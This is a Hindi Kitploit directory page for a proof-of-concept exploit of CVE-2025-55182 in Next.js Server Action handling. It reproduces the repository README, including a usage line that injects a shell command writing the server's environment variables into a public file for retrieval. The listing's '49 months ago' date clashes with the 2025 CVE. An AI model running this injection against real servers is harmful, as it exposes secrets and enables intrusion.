Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Next.js के multipart/Next-Action हैंडलिंग को लक्षित करता है, जिसमें स्थानीय कमांड इंजेक्शन प्रदर्शन स्क्रिप्ट शामिल है। | Kitploit
उपकरण/GitHubGitHub/youneszddz/cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubyouneszddz/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Next.js के multipart/Next-Action हैंडलिंग को लक्षित करता है, जिसमें स्थानीय कमांड इंजेक्शन प्रदर्शन स्क्रिप्ट शामिल है।

रिपॉजिटरी देखें
49 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 Nextjs POC

एक छोटा भंडार जिसमें शामिल है:

  • test-app/: एक Next.js 16 (React 19) परीक्षण अनुप्रयोग जो App Router का उपयोग करता है।
  • exploit.js: एक स्थानीय प्रमाण-अवधारणा स्क्रिप्ट जिसका उपयोग multipart/Next-Action हैंडलिंग के आसपास सर्वर व्यवहार को प्रदर्शित और परीक्षण करने के लिए किया जाता है। केवल स्थानीय परीक्षण के लिए अभिप्रेत है।

भंडार संरचना

root@kitploit:~
rsc-test-app/
├─ README.md                # आप यहाँ हैं
├─ exploit.js               # PoC स्क्रिप्ट (केवल स्थानीय)
└─ test-app/                # Next.js अनुप्रयोग
   ├─ app/                  # App Router पेज
   ├─ public/               # स्थैतिक संपत्तियाँ (और env.txt जब उत्पन्न हो)
   ├─ package.json          # Next 16 / React 19
   └─ README.md             # डिफ़ॉल्ट Next.js टेम्पलेट README

पूर्वापेक्षाएँ

  • Node.js 18+ अनुशंसित (Node 22 के साथ परीक्षण किया गया)
  • npm (या आपका पसंदीदा पैकेज प्रबंधक)

आरंभ करना (Next.js ऐप)

  1. निर्भरताएँ स्थापित करें:
root@kitploit:~
cd test-app
npm install
  1. डेव सर्वर चलाएँ:
root@kitploit:~
npm run dev
# ऐप http://localhost:3000 पर उपलब्ध होगा
  1. निर्माण और प्रारंभ (उत्पादन):
root@kitploit:~
npm run build
npm start

स्थानीय PoC स्क्रिप्ट: exploit.js

यह स्क्रिप्ट सर्वर व्यवहार का परीक्षण करने के लिए Next-Action हेडर के साथ एक multipart अनुरोध तैयार करती है। डिफ़ॉल्ट रूप से, यह सर्वर प्रक्रिया पर एक कमांड निष्पादित करने का प्रयास करती है जो पर्यावरण को public/env.txt में लिखता है (स्थानीय/डेव वातावरण में प्रदर्शन के लिए)।

महत्वपूर्ण नोट:

  • यह केवल स्थानीय परीक्षण के लिए है। उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की अनुमति नहीं है।
  • स्क्रिप्ट मानती है कि सर्वर वर्किंग डायरेक्टरी संरेखित है ताकि public/ test-app/public/ के अंतर्गत हल हो।

उपयोग

एक अलग टर्मिनल में, सुनिश्चित करें कि Next.js ऐप http://localhost:3000 पर चल रहा है:

root@kitploit:~
cd test-app
npm run dev

भंडार के मूल से, स्क्रिप्ट चलाएँ:

root@kitploit:~
node exploit.js http://localhost:3000 "sh -lc 'printenv > public/env.txt'"

पैरामीटर:

  • बेस URL (वैकल्पिक): डिफ़ॉल्ट http://localhost:3000 है।
  • कमांड (वैकल्पिक): डिफ़ॉल्ट sh -lc 'printenv > public/env.txt' है।

चलाने के बाद, उत्पन्न फ़ाइल की जाँच करें:

root@kitploit:~
http://localhost:3000/env.txt

पर पहुँच कर।

और इस प्रकार आपके पास सर्वर के env चर हैं।

टूल डाउनलोड करें